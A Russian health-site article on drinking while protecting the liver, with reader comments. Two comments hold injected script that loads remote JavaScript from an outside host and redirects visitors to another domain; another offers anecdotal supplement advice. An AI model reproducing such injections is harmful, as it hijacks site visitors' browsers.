Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как выпить и защитить печ...  >>  Как выпить и защитить печень
 
Обратная связь
 

Как выпить и защитить печень

Размер шрифта
01 октября 2013 00:00
  • google_analytics: false
  • Нравится

Все мы знаем, что алкоголь «бьет» по печени. Но пить-то иногда приходится. Как же выпить и защитить печень?

Как выпить и защитить печень

Любой алкоголь, который поступает в организм, попадает в печень, расщепляется до безопасных компонентов и только после этого попадает в кровоток. Однако расщепление алкоголя – это всего лишь одна из многочисленных функций, которые выполняет печень. Если в организм поступает слишком много алкоголя, то печень не справляется. Нерасщепленный алкоголь попадает в кровоток, что приводит к развитию интоксикации, то есть алкогольного опьянения.

 Если вы злоупотребляете алкоголем, то печень вынуждена работать с перегрузкой, в результате чего ее клетки разрушаются. Разрушение печеночных клеток может сопровождаться накоплением жира в печени (жировой гепатоз), воспалением печени (алкогольный гепатит), образованием фиброзной ткани (цирроз) и даже раком печени.

В следующий раз, когда окажетесь за праздничным столом или барной стойкой, не забудьте наши советы, которые помогут сохранить здоровье печени.

  • Не пытайтесь пить наравне со своими друзьями, ведь у всех людей разная толерантность к алкоголю. Вам кажется, что вы знаете свою норму, но на самом деле количество алкоголя, которое будет для вас безопасным, зависит от многих факторов, в частности от пола, национальности, веса и состояния здоровья.
  • Не думайте, что одни алкогольные напитки безопаснее, чем другие. На самом деле, все зависит не от вида алкогольного напитка, а от количества алкоголя. Запомните, что 341 миллилитр пива эквивалентен 142 миллилитрам вина, 86 миллилитрам хереса/портвейна или 43 миллилитрам чистого спирта.
  • Никогда не смешивайте алкоголь с лекарствами. Например, сочетание парацетамола с алкоголем может привести к печеночной недостаточности.
  • У женщин всасывается больше алкоголя, чем у мужчин, поэтому у них выше риск развития алкогольной болезни печени. Никогда не заставляйте себя выпить больше, чем можете.
  • Всем пациентам, страдающим заболеваниями печени, необходимо полностью отказаться от алкоголя, так как он усугубляет течение заболевания.
  • Не играйте в игры, в которых необходимо выпить большое количество алкоголя за короткий промежуток времени.
  • Ограничьте употребление алкоголя до одной-двух порций, но не каждый день. Если у вас проблемы с печенью, забудьте об алкоголе.

Более подробная информация представлена в материалах нашего специального проекта «Заботься о печени».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

3 - Гость

28 ноября 2015 в 14:47

Цитировать   |   Пожаловаться

Я уже даже и не помню, кто и когда точно это было, но кто-то советовал мне для защиты печени от этого дела принимать профилактическими курсами ЛИВ52 (это гепатопротектор на основе трав). Вот уже несколько лет так и делаю и на печень вообще никаких жалоб! 

Статьи

       
Сколько можно выпить, чтобы не было рака печени   Как не напиться   Чья печень в опасности: алкотипы. Часть 5   Для кого алкоголь опасней всего  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что алкоголь делает с печенью
Главные причины депрессии и как от них избавиться
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.